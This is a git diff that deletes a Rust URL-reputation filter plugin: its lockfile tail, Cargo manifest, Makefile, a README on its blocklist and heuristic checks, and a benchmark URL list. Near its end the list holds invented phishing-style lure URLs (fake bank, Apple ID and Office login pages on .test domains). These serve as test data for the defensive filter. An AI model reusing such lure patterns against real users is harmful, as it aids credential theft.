-source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "dc897dd8d9e8bd1ed8cdad82b5966c3e0ecae09fb1907d58efaa013543185d0a" - -[[package]] -name = "rustversion" -version = "1.0.22" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b39cdef0fa800fc44525c84ccb54a029961a8215f9619753635a9c0d2538d46d" - -[[package]] -name = "same-file" -version = "1.0.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" -dependencies = [ - "winapi-util", -] - -[[package]] -name = "serde" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9a8e94ea7f378bd32cbbd37198a4a91436180c5bb472411e48b5ec2e2124ae9e" -dependencies = [ - "serde_core", - "serde_derive", -] - -[[package]] -name = "serde_core" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "41d385c7d4ca58e59fc732af25c3983b67ac852c1a25000afe1175de458b67ad" -dependencies = [ - "serde_derive", -] - -[[package]] -name = "serde_derive" -version = "1.0.228" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d540f220d3187173da220f885ab66608367b6574e925011a9353e4badda91d79" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "serde_json" -version = "1.0.149" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "83fc039473c5595ace860d8c4fafa220ff474b3fc6bfdb4293327f1a37e94d86" -dependencies = [ - "itoa", - "memchr", - "serde", - "serde_core", - "zmij", -] - -[[package]] -name = "shlex" -version = "1.3.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0fda2ff0d084019ba4d7c6f371c95d8fd75ce3524c3cb8fb653a3023f6323e64" - -[[package]] -name = "siphasher" -version = "1.0.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b2aa850e253778c88a04c3d7323b043aeda9d3e30d5971937c1855769763678e" - -[[package]] -name = "smallvec" -version = "1.15.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "67b1b7a3b5fe4f1376887184045fcf45c69e92af734b7aaddc05fb777b6fbd03" - -[[package]] -name = "stable_deref_trait" -version = "1.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6ce2be8dc25455e1f91df71bfa12ad37d7af1092ae736f3a6cd0e37bc7810596" - -[[package]] -name = "syn" -version = "2.0.117" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e665b8803e7b1d2a727f4023456bbbbe74da67099c585258af0ad9c5013b9b99" -dependencies = [ - "proc-macro2", - "quote", - "unicode-ident", -] - -[[package]] -name = "synstructure" -version = "0.13.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "728a70f3dbaf5bab7f0c4b1ac8d7ae5ea60a4b5549c8a5914361c99147a709d2" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "target-lexicon" -version = "0.13.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "adb6935a6f5c20170eeceb1a3835a49e12e19d792f6dd344ccc76a985ca5a6ca" - -[[package]] -name = "tinystr" -version = "0.8.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "42d3e9c45c09de15d06dd8acf5f4e0e399e85927b7f00711024eb7ae10fa4869" -dependencies = [ - "displaydoc", - "zerovec", -] - -[[package]] -name = "tinytemplate" -version = "1.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "be4d6b5f19ff7664e8c98d03e2139cb510db9b0a60b55f8e8709b689d939b6bc" -dependencies = [ - "serde", - "serde_json", -] - -[[package]] -name = "tinyvec" -version = "1.11.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3e61e67053d25a4e82c844e8424039d9745781b3fc4f32b8d55ed50f5f667ef3" -dependencies = [ - "tinyvec_macros", -] - -[[package]] -name = "tinyvec_macros" -version = "0.1.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1f3ccbac311fea05f86f61904b462b55fb3df8837a366dfc601a0161d0532f20" - -[[package]] -name = "unicode-ident" -version = "1.0.24" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e6e4313cd5fcd3dad5cafa179702e2b244f760991f45397d14d4ebf38247da75" - -[[package]] -name = "unicode-normalization" -version = "0.1.25" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5fd4f6878c9cb28d874b009da9e8d183b5abc80117c40bbd187a1fde336be6e8" -dependencies = [ - "tinyvec", -] - -[[package]] -name = "unicode-script" -version = "0.5.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "383ad40bb927465ec0ce7720e033cb4ca06912855fc35db31b5755d0de75b1ee" - -[[package]] -name = "unicode-security" -version = "0.1.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2e4ddba1535dd35ed8b61c52166b7155d7f4e4b8847cec6f48e71dc66d8b5e50" -dependencies = [ - "unicode-normalization", - "unicode-script", -] - -[[package]] -name = "url" -version = "2.5.8" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff67a8a4397373c3ef660812acab3268222035010ab8680ec4215f38ba3d0eed" -dependencies = [ - "form_urlencoded", - "idna", - "percent-encoding", - "serde", -] - -[[package]] -name = "url_reputation" -version = "0.1.1" -dependencies = [ - "criterion", - "idna", - "log", - "phf", - "pyo3", - "pyo3-log", - "regex", - "unicode-script", - "unicode-security", - "url", -] - -[[package]] -name = "utf8_iter" -version = "1.0.4" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b6c140620e7ffbb22c2dee59cafe6084a59b5ffc27a8859a5f0d494b5d52b6be" - -[[package]] -name = "walkdir" -version = "2.5.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "29790946404f91d9c5d06f9874efddea1dc06c5efe94541a7d6863108e3a5e4b" -dependencies = [ - "same-file", - "winapi-util", -] - -[[package]] -name = "wasm-bindgen" -version = "0.2.114" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6532f9a5c1ece3798cb1c2cfdba640b9b3ba884f5db45973a6f442510a87d38e" -dependencies = [ - "cfg-if", - "once_cell", - "rustversion", - "wasm-bindgen-macro", - "wasm-bindgen-shared", -] - -[[package]] -name = "wasm-bindgen-macro" -version = "0.2.114" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "18a2d50fcf105fb33bb15f00e7a77b772945a2ee45dcf454961fd843e74c18e6" -dependencies = [ - "quote", - "wasm-bindgen-macro-support", -] - -[[package]] -name = "wasm-bindgen-macro-support" -version = "0.2.114" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "03ce4caeaac547cdf713d280eda22a730824dd11e6b8c3ca9e42247b25c631e3" -dependencies = [ - "bumpalo", - "proc-macro2", - "quote", - "syn", - "wasm-bindgen-shared", -] - -[[package]] -name = "wasm-bindgen-shared" -version = "0.2.114" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "75a326b8c223ee17883a4251907455a2431acc2791c98c26279376490c378c16" -dependencies = [ - "unicode-ident", -] - -[[package]] -name = "web-sys" -version = "0.3.91" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "854ba17bb104abfb26ba36da9729addc7ce7f06f5c0f90f3c391f8461cca21f9" -dependencies = [ - "js-sys", - "wasm-bindgen", -] - -[[package]] -name = "winapi" -version = "0.3.9" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" -dependencies = [ - "winapi-i686-pc-windows-gnu", - "winapi-x86_64-pc-windows-gnu", -] - -[[package]] -name = "winapi-i686-pc-windows-gnu" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" - -[[package]] -name = "winapi-util" -version = "0.1.11" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" -dependencies = [ - "windows-sys", -] - -[[package]] -name = "winapi-x86_64-pc-windows-gnu" -version = "0.4.0" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" - -[[package]] -name = "windows-link" -version = "0.2.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5" - -[[package]] -name = "windows-sys" -version = "0.61.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ae137229bcbd6cdf0f7b80a31df61766145077ddf49416a728b02cb3921ff3fc" -dependencies = [ - "windows-link", -] - -[[package]] -name = "writeable" -version = "0.6.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9edde0db4769d2dc68579893f2306b26c6ecfbe0ef499b013d731b7b9247e0b9" - -[[package]] -name = "yoke" -version = "0.8.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "72d6e5c6afb84d73944e5cedb052c4680d5657337201555f9f2a16b7406d4954" -dependencies = [ - "stable_deref_trait", - "yoke-derive", - "zerofrom", -] - -[[package]] -name = "yoke-derive" -version = "0.8.1" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b659052874eb698efe5b9e8cf382204678a0086ebf46982b79d6ca3182927e5d" -dependencies = [ - "proc-macro2", - "quote", - "syn", - "synstructure", -] - -[[package]] -name = "zerocopy" -version = "0.8.42" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f2578b716f8a7a858b7f02d5bd870c14bf4ddbbcf3a4c05414ba6503640505e3" -dependencies = [ - "zerocopy-derive", -] - -[[package]] -name = "zerocopy-derive" -version = "0.8.42" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7e6cc098ea4d3bd6246687de65af3f920c430e236bee1e3bf2e441463f08a02f" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "zerofrom" -version = "0.1.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "50cc42e0333e05660c3587f3bf9d0478688e15d870fab3346451ce7f8c9fbea5" -dependencies = [ - "zerofrom-derive", -] - -[[package]] -name = "zerofrom-derive" -version = "0.1.6" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d71e5d6e06ab090c67b5e44993ec16b72dcbaabc526db883a360057678b48502" -dependencies = [ - "proc-macro2", - "quote", - "syn", - "synstructure", -] - -[[package]] -name = "zerotrie" -version = "0.2.3" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2a59c17a5562d507e4b54960e8569ebee33bee890c70aa3fe7b97e85a9fd7851" -dependencies = [ - "displaydoc", - "yoke", - "zerofrom", -] - -[[package]] -name = "zerovec" -version = "0.11.5" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6c28719294829477f525be0186d13efa9a3c602f7ec202ca9e353d310fb9a002" -dependencies = [ - "yoke", - "zerofrom", - "zerovec-derive", -] - -[[package]] -name = "zerovec-derive" -version = "0.11.2" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eadce39539ca5cb3985590102671f2567e659fca9666581ad3411d59207951f3" -dependencies = [ - "proc-macro2", - "quote", - "syn", -] - -[[package]] -name = "zmij" -version = "1.0.21" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b8848ee67ecc8aedbaf3e4122217aff892639231befc6a1b58d29fff4c2cabaa" diff --git a/plugins_rust/url_reputation/Cargo.toml b/plugins_rust/url_reputation/Cargo.toml deleted file mode 100644 index 9fdbf4736f..0000000000 --- a/plugins_rust/url_reputation/Cargo.toml +++ /dev/null @@ -1,41 +0,0 @@ -[package] -name = "url_reputation" -version = "0.1.1" -edition = "2024" -authors = ["ContextForge Contributors"] -license = "Apache-2.0" -repository = "https://github.com/IBM/mcp-context-forge" -description = "High-performance URL reputation validation library" - -# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html -[lib] -name = "url_reputation_rust" -crate-type = ["cdylib", "rlib"] - -[dependencies] -idna = "1.1.0" -log = "0.4" -phf = { version = "0.13.1", features = ["macros"] } -pyo3 = { version = "0.28.2", features = ["abi3-py311"] } -pyo3-log = "0.13.3" -regex = "1.12.3" -unicode-script = "0.5.8" -unicode-security = "0.1.2" -url = "2.5.8" - -[dev-dependencies] -criterion = "0.8.2" - -[[bench]] -name = "url_validation" -harness = false - -[profile.release] -opt-level = 3 -lto = "fat" -codegen-units = 1 -strip = true - -[profile.bench] -inherits = "release" -debug = true diff --git a/plugins_rust/url_reputation/Makefile b/plugins_rust/url_reputation/Makefile deleted file mode 100644 index f780d6855d..0000000000 --- a/plugins_rust/url_reputation/Makefile +++ /dev/null @@ -1,149 +0,0 @@ -# Makefile for URL Reputation Plugin (Rust) -# Copyright 2026 -# SPDX-License-Identifier: Apache-2.0 -# -# Plugin-specific operations for url_reputation -# -# Quick commands: -# make install - Build & install url_reputation plugin -# make test - Run Rust tests -# make test-python - Run Python tests -# make bench - Run benchmarks -# make compare - Compare Python vs Rust performance - -.PHONY: help build dev stub-gen test test-python clean fmt fmt-check clippy check-all bench audit audit-fix doc doc-open coverage install compare uninstall verify - -# Default target -.DEFAULT_GOAL := help - -# Colors for output -BLUE := \033[0;34m -GREEN := \033[0;32m -YELLOW := \033[0;33m -RED := \033[0;31m -NC := \033[0m # No Color - -help: ## Show this help message - @echo "$(BLUE)URL Reputation Plugin Makefile$(NC)" - @echo "" - @echo "$(GREEN)Available targets:$(NC)" - @grep -E '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) | awk 'BEGIN {FS = ":.*?## "}; {printf " $(BLUE)%-20s$(NC) %s\n", $$1, $$2}' - @echo "" - @echo "$(YELLOW)Examples:$(NC)" - @echo " make install # Build and install plugin" - @echo " make test # Run Rust tests" - @echo " make test-python # Run Python unit tests" - - -# Stub generation -stub-gen: ## Generate Python type stubs (.pyi files) - @echo "$(GREEN)Generating Python type stubs...$(NC)" - @mkdir -p python/url_reputation_rust - @cp url_reputation_rust.pyi python/url_reputation_rust/__init__.pyi - @echo "$(GREEN)Type stubs generated at python/url_reputation_rust/__init__.pyi$(NC)" - - -# Build targets -build: stub-gen ## Build plugin in release mode - @echo "$(GREEN)Building url_reputation_rust plugin...$(NC)" - @cd ../.. && uv run maturin build --release --manifest-path plugins_rust/url_reputation/Cargo.toml - -dev: stub-gen ## Build and install plugin in dev mode (faster, no optimizations) - @echo "$(GREEN)Installing url_reputation_rust plugin (dev mode)...$(NC)" - @cd ../.. && uv run maturin develop --manifest-path plugins_rust/url_reputation/Cargo.toml - @echo "$(GREEN)Verifying installation...$(NC)" - @uv run python -c "import url_reputation_rust; print('✓ url_reputation_rust installed'); print('✓ Module:', url_reputation_rust.__file__)" || { echo "$(RED)Installation verification failed!$(NC)"; exit 1; } - -install: stub-gen ## Build and install plugin (maturin develop) - @echo "$(GREEN)Installing url_reputation_rust plugin...$(NC)" - @cd ../.. && uv run maturin develop --release --manifest-path plugins_rust/url_reputation/Cargo.toml - @echo "$(GREEN)Verifying installation...$(NC)" - @uv run python -c "import url_reputation_rust; print('✓ url_reputation_rust installed'); print('✓ Module:', url_reputation_rust.__file__)" || { echo "$(RED)Installation verification failed!$(NC)"; exit 1; } - @echo "$(GREEN)Installation verified successfully!$(NC)" - -uninstall: ## Uninstall plugin from Python environment - @echo "$(YELLOW)Uninstalling url_reputation_rust...$(NC)" - @uv pip uninstall -y url_reputation_rust 2>/dev/null || pip uninstall -y url_reputation_rust 2>/dev/null || true - @echo "$(GREEN)url_reputation_rust uninstalled$(NC)" - -verify: ## Verify plugin installation - @echo "$(GREEN)Verifying url_reputation_rust installation...$(NC)" - @uv run python -c "import url_reputation_rust; print('✅ url_reputation_rust available')" || echo "⚠️ url_reputation_rust not installed" - - -# Testing targets -test: ## Run Rust tests - @echo "$(GREEN)Running Rust tests...$(NC)" - cargo test - -test-verbose: ## Run Rust tests (verbose) - @echo "$(GREEN)Running Rust tests (verbose)...$(NC)" - cargo test --verbose - -test-python: ## Run Python tests (requires dev install) - @echo "$(GREEN)Running Python unit tests...$(NC)" - cd ../.. && uv run pytest tests -k url_reputation -v - -fmt: ## Format code with rustfmt - @echo "$(GREEN)Formatting code...$(NC)" - cargo fmt - -fmt-check: ## Check code format - @echo "$(GREEN)Checking code format...$(NC)" - cargo fmt -- --check - -clippy: ## Run clippy linter - @echo "$(GREEN)Running clippy...$(NC)" - cargo clippy --all-targets --all-features -- -D warnings - -check-all: ## Run all checks (format, lint, test) - @echo "$(GREEN)Running all checks...$(NC)" - @$(MAKE) --no-print-directory fmt-check - @$(MAKE) --no-print-directory clippy - @$(MAKE) --no-print-directory test - -audit: ## Run cargo-audit - @echo "$(GREEN)Running security audit...$(NC)" - @command -v cargo-audit >/dev/null 2>&1 || { echo "$(YELLOW)Installing cargo-audit...$(NC)"; cargo install cargo-audit; } - cargo audit - -audit-fix: ## Fix audit issues - @echo "$(GREEN)Running security audit with fixes...$(NC)" - cargo audit fix - -# Benchmarks -bench: ## Run Rust benchmarks with criterion - @echo "$(GREEN)Running benchmarks...$(NC)" - cargo bench - -compare: ## Compare Python vs Rust performance - @echo "$(GREEN)Comparing Python vs Rust performance...$(NC)" - cd ../.. && uv run python plugins_rust/url_reputation/compare_performance.py - -# Documentation -doc: ## Build Rust docs - @echo "$(GREEN)Building documentation...$(NC)" - cargo doc --no-deps --document-private-items - -doc-open: doc ## Open docs in browser - @echo "$(GREEN)Opening documentation...$(NC)" - xdg-open target/doc/url_reputation_rust/index.html - -# Coverage -coverage: ## Generate code coverage using cargo llvm-cov - @echo "$(GREEN)Generating coverage report using llvm-cov...$(NC)" - @command -v cargo-llvm-cov >/dev/null 2>&1 || { \ - echo "$(YELLOW)Installing cargo-llvm-cov...$(NC)"; \ - cargo install cargo-llvm-cov; \ - } - @rm -rf coverage/ - cargo llvm-cov - -# Cleaning -clean: ## Clean build artifacts - @echo "$(YELLOW)Cleaning build artifacts...$(NC)" - cargo clean - rm -rf coverage/ - find . -type f -name "*.whl" -delete - find . -type f -name "*.pyc" -delete - find . -type d -name "__pycache__" -exec rm -rf {} + 2>/dev/null || true diff --git a/plugins_rust/url_reputation/README.md b/plugins_rust/url_reputation/README.md deleted file mode 100644 index 184089025a..0000000000 --- a/plugins_rust/url_reputation/README.md +++ /dev/null @@ -1,174 +0,0 @@ -# URL Reputation (Rust) -> Author: Matheus Cafalchio -> Version: 0.1.0 - -Blocks URLs based on configured blocked domains, patterns and heuristics before resource fetch. Designed for fast and efficient resource checks. - - -## Hooks -- resource_pre_fetch – triggered before any resource is fetched. - -## Config -```yaml -config: - whitelist_domains: ["ibm.com", "yourdomain.com"] - allowed_patterns: ["^https://trusted\\.internal/.*"] - blocked_domains: ["malicious.example.com"] - blocked_patterns: ["casino", "crypto"] - use_heuristic_check: true - entropy_threshold: 3.65 - block_non_secure_http: true -``` -## Config Description - -* **whitelist_domains** - - A set of domains that are allowed to be fetched without any checks. - -* **allowed_patterns** - - A list of regex patterns matched against the full URL. If any pattern matches, the URL is allowed and skips all remaining checks — including the non-secure HTTP check. Evaluated after the whitelist, before scheme enforcement. - -* **blocked_domains** - - A set of domains that will always be blocked. - -* **blocked_patterns** - - A list of regex patterns matched against the full URL. If any pattern matches, the URL is blocked. - -* **use_heuristic_check** - - Whether heuristic checks (entropy, TLD validity, unicode security) should be performed. Default: `false`. - -* **entropy_threshold** - - Maximum allowed Shannon entropy for a domain. Higher entropy may indicate suspicious/malicious domains. - -* **block_non_secure_http** - - Whether URLs using `http` (non-secure) should be blocked. Default: `true`. - -## Architecture - -```mermaid -flowchart LR - Start([URL Input]) --> Parse{Parse & Extract Domain} - Parse -->|Fail| Block1[❌ Parse Error] - Parse -->|Success| DetectIP[Detect IP] - - DetectIP --> Whitelist{Whitelist?} - Whitelist -->|Yes| Success[✅ Allow] - Whitelist -->|No| AllowPat{Allowed Pattern?} - - AllowPat -->|Yes| Success - AllowPat -->|No| HTTP{Scheme = HTTPS
or not enforced?} - - HTTP -->|No| Block2[❌ Non-HTTPS] - HTTP -->|Yes| BlockedDom{Blocked Domain
or Pattern?} - - BlockedDom -->|Yes| Block3[❌ Blocked] - BlockedDom -->|No| Heuristic{Heuristic Check
Enabled & Not IP?} - - Heuristic -->|No| Success - Heuristic -->|Yes| Checks{Pass Entropy,
TLD & Unicode?} - - Checks -->|No| Block4[❌ Heuristic Fail] - Checks -->|Yes| Success - - Block1 --> End([Return]) - Block2 --> End - Block3 --> End - Block4 --> End - Success --> End - - style Start fill:#e1f5ff - style End fill:#e1f5ff - style Success fill:#c8e6c9 - style Block1 fill:#ffcdd2 - style Block2 fill:#ffcdd2 - style Block3 fill:#ffcdd2 - style Block4 fill:#ffcdd2 -``` - -## Logic workflow - -1. **Parse & Normalize URL** - - Trim the input URL, then parse it (scheme and host are normalised to lowercase by the URL parser per RFC 3986; path and query retain original casing). - - **Fail → Violation:** `"Could not parse url"`. - -2. **Extract Domain** - - Get the host string from the URL. - - **Fail → Violation:** `"Could not parse domain"`. - -3. **Detect IP Address** - - Determine if domain is an IPv4 or IPv6 address. - - Skip heuristic checks for IPs. - -4. **Whitelist Check** - - If domain is in `whitelist_domains` → **continue_processing = true**, skip all further checks. - -5. **Allowed Patterns Check** - - If URL matches any regex in `allowed_patterns` → **continue_processing = true**, skip all further checks. - - Note: this check runs _before_ scheme enforcement, so an `allowed_patterns` match can bypass the non-secure HTTP block. - -6. **Block Non-Secure HTTP** - - If scheme ≠ `"https"` **and** `block_non_secure_http` → **Violation:** `"Blocked non secure http url"`. - -7. **Blocked Domains** - - If domain is in `blocked_domains` → **Violation:** `"Domain in blocked set"`. - -8. **Blocked Patterns** - - If URL matches any regex in `blocked_patterns` → **Violation:** `"Blocked pattern"`. - -9. **Heuristic Checks** *(only for non-IP domains and if `use_heuristic_check = true`)*: - 9.1 **High Entropy Check** – If Shannon entropy > `entropy_threshold` → **Violation:** `"High entropy domain"`. - 9.2 **TLD Validity Check** – Validate top-level domain. Fail → **Violation:** `"Illegal TLD"`. - 9.3 **Unicode Security Check** – Validate domain unicode. Fail → **Violation:** `"Domain unicode is not secure"`. - -10. **Final Outcome** - - If no violations → **continue_processing = true**. - - If any check fails → return first `PluginViolation` and **continue_processing = false**. - - - -## Limitations - - - Static lists only; no external reputation providers. - - Ianna valid TLDs are static and will be out of date - - Ignores other schemes that are not http and https - - No external domain reputation checks - -## TODOs - - External threat-intel integration with cache – Query external feeds for known malicious domains. - - IP address handling policy – Decide rules for IPv4/IPv6 URLs. - - Dynamic TLD updates – Fetch latest IANA TLD list automatically. - - - - - -## Tests - -**Test Coverage** (24 unit tests, all passing): - -| Filename | Function Coverage | Line Coverage | Region Coverage | -|--------------------------|-------------------|-----------------|-----------------| -| engine.rs | 96.55% (28/29) | 99.26% (533/537) | 98.60% (634/643) | -| filters/heuristic.rs | 100.00% (5/5) | 96.49% (55/57) | 97.53% (79/81) | -| filters/patterns.rs | 100.00% (5/5) | 100.00% (20/20) | 100.00% (38/38) | -| lib.rs | 0.00% (0/1) | 0.00% (0/5) | 0.00% (0/7) | -| types.rs | 50.00% (3/6) | 44.12% (15/34) | 23.94% (17/71) | -| **TOTAL** | **89.13% (41/46)** | **95.43% (627/657)** | **91.45% (770/842)** | - -*Note: `lib.rs` and `types.rs` contain PyO3 bindings and module declarations not covered by unit tests.* - -**New test coverage includes:** -- Invalid regex pattern handling (both allowed and blocked patterns) -- Case-insensitive domain matching (whitelist and blocklist) -- Subdomain matching validation - -**Run tests:** -```bash -cargo test --lib # Run all unit tests -cargo llvm-cov --lib --html # Generate coverage report -``` - -## Heuristic methods - -The heuristics were based on a research paper. - - A. P. S. Bhadauria and M. Singh, "Domain‑Checker: A Classification of Malicious and Benign Domains Using Multitier Filtering," Springer Nature, 2023. diff --git a/plugins_rust/url_reputation/__init__.py b/plugins_rust/url_reputation/__init__.py deleted file mode 100644 index e69de29bb2..0000000000 diff --git a/plugins_rust/url_reputation/bench_config.json b/plugins_rust/url_reputation/bench_config.json deleted file mode 100644 index 930cd8b430..0000000000 --- a/plugins_rust/url_reputation/bench_config.json +++ /dev/null @@ -1,280 +0,0 @@ -{ - "urls": [ - "https://example-search.test/query?q=python+validation", - "https://code-host.test/user/repo/issues/123", - "https://dev-forum.test/questions/12345/parsing-urls", - "https://docs-site.test/library/async.html", - "https://blog-platform.test/article/building-filters", - "https://tech-news.test/item?id=38765432", - "https://api-service.test/repos/org/project/pulls", - "https://cdn-provider.test/static/js/app.bundle.js", - "https://shop-site.test/products/item-48291", - "https://marketplace.test/product/B08N5WRWNW", - "https://accounts-portal.test/login?redirect=/dashboard", - "https://company-blog.test/2026/02/security-practices.html", - "https://payment-api.test/v1/intents/pi_123456789", - "https://support-center.test/articles/987654321", - "https://cloud-storage.test/file/1abcDEFghIJkLmNoP", - "https://analytics-service.test/collect?event=click", - "https://admin-portal.test/users?page=3", - "https://professional-network.test/profile/john-doe", - "https://social-platform.test/post/1893456723456789012", - "https://hosting-service.test:8443/api/v2/config", - "https://discussion-board.test/topic/abc123", - "https://asset-cdn.test/images/banner_2026.png", - "https://search-api.test/query?q=entropy&limit=25", - "https://webapp.test/settings/profile#notifications", - "https://developer-docs.test/http/overview", - "https://auth-service.test/oauth2/v2.0/authorize", - "https://file-share.test/download/report-2026.pdf", - "https://weather-api.test/forecast/daily/5day", - "https://video-platform.test/watch?v=abcDEF12345", - "https://community-site.test/topic/feedback/4567", - "https://news-outlet.test/2026/02/20/technology", - "https://package-cdn.test/library@4.2.1/dist/index.js", - "https://monitoring-dash.test/health?region=east", - "https://email-service.test/inbox", - "https://data-export.test/export?format=json", - "https://onboarding-app.test/step/2?ref=invite", - "https://checkout-secure.test/order?id=ORD-998877", - "https://business-news.test/articles/market-2026", - "https://ai-api.test/v1/chat/completions", - "https://package-registry.test/package-name/latest", - "https://container-hub.test/library/nginx", - "https://python-packages.test/project/requests", - "https://extension-store.test/items?name=python-ext", - "https://project-tools.test/software/tracker", - "https://team-chat.test/api/conversations.list", - "https://task-board.test/board/abc123/project", - "https://design-tool.test/file/abc123/system", - "https://workspace-docs.test/page-abc123", - "https://video-conf.test/meeting/1234567890", - "https://collab-platform.test/meetup-join/abc123", - "https://calendar-app.test/calendar/view", - "https://mail-client.test/mail/inbox", - "https://file-sync.test/shared/file.pdf", - "https://cloud-drive.test/view?resid=abc123", - "https://personal-cloud.test/drive/abc123", - "https://cloud-console-a.test/dashboard", - "https://cloud-console-b.test/projects", - "https://cloud-console-c.test/resources", - "https://infra-tool.test/workspaces", - "https://platform-dash.test/apps", - "https://deploy-service.test/dashboard", - "https://hosting-app.test/sites", - "https://edge-network.test/dashboard", - "https://metrics-dash.test/dashboard/abc123", - "https://time-series.test/graph", - "https://log-viewer.test/app/discover", - "https://error-tracker.test/org/issues", - "https://observability.test/dashboard", - "https://incident-mgmt.test/incidents", - "https://log-analytics.test/products", - "https://search-engine.test/elasticsearch", - "https://cache-db.test/documentation", - "https://relational-db.test/docs", - "https://document-db.test/docs", - "https://wide-column-db.test/doc", - "https://message-queue.test/documentation", - "https://message-broker.test/documentation", - "https://rpc-framework.test/docs", - "https://query-language.test/learn", - "https://graphql-client.test/docs", - "https://react-framework.test/docs", - "https://ui-library.test/learn", - "https://js-framework-a.test/guide", - "https://js-framework-b.test/docs", - "https://js-framework-c.test/docs", - "https://css-framework.test/docs", - "https://ui-toolkit.test/docs", - "https://component-lib.test/getting-started", - "https://typed-js.test/docs", - "https://bundler-a.test/concepts", - "https://bundler-b.test/guide", - "https://bundler-c.test/guide", - "https://bundler-d.test/docs", - "https://transpiler.test/docs", - "https://linter-tool.test/docs", - "https://formatter-tool.test/docs", - "https://test-framework-a.test/docs", - "https://test-framework-b.test/guide", - "https://e2e-testing.test/docs", - "https://browser-testing.test/docs", - "https://testing-utils.test/docs", - "https://ui-dev-tool.test/docs", - "https://visual-testing.test/docs", - "https://error-monitor-a.test/platforms/javascript", - "https://error-monitor-b.test/docs/platforms/javascript", - "https://error-monitor-c.test/docs", - "https://session-replay.test/docs", - "https://apm-service-a.test/docs", - "https://apm-service-b.test/support/doc", - "https://apm-service-c.test/docs", - "https://repo-host-a.test/docs", - "https://repo-host-b.test/docs", - "https://repo-host-c.test/product/guides", - "https://ci-service-a.test/doc", - "https://ci-service-b.test/docs", - "https://ci-service-c.test/docs", - "https://ci-service-d.test/docs", - "https://ide-vendor.test/help", - "https://code-editor.test/docs", - "https://text-editor.test/docs", - "https://secure-payment-verify.test/login/verify", - "https://appleid-confirm-secure.test/session/restore", - "https://office-auth-portal.test/owa/login.php", - "https://bank-secure-alert.test/customer/validate", - "https://crypto-wallet-verify.test/auth/recover", - "https://social-security-check.test/account/reset", - "https://bank-support-portal.test/secure/message", - "https://shop-account-review.test/update-info", - "https://business-verify-portal.test/appeal/case-77812", - "https://storage-file-confirm.test/share/login", - "https://search-account-confirm.test/verify", - "https://payment-auth-secure.test/billing", - "https://streaming-verify-center.test/renew", - "https://payment-security-alert.test/confirm", - "https://account-unusual-activity.test/review", - "https://social-security-notify.test/verify", - "https://premium-member-confirm.test/update", - "https://bank-online-verify.test/login", - "https://bank-account-alert.test/verify", - "https://bank-fraud-prevent.test/confirm", - "https://card-security-verify.test/authenticate", - "https://card-account-verify.test/confirm", - "https://card-security-center.test/verify", - "https://bank-verify-portal.test/login", - "https://bank-alert-center.test/verify", - "https://bank-account-verify.test/confirm", - "https://bank-online-secure.test/verify", - "https://bank-verify-center.test/authenticate", - "https://bank-security-notify.test/verify", - "https://bank-account-alert.test/confirm", - 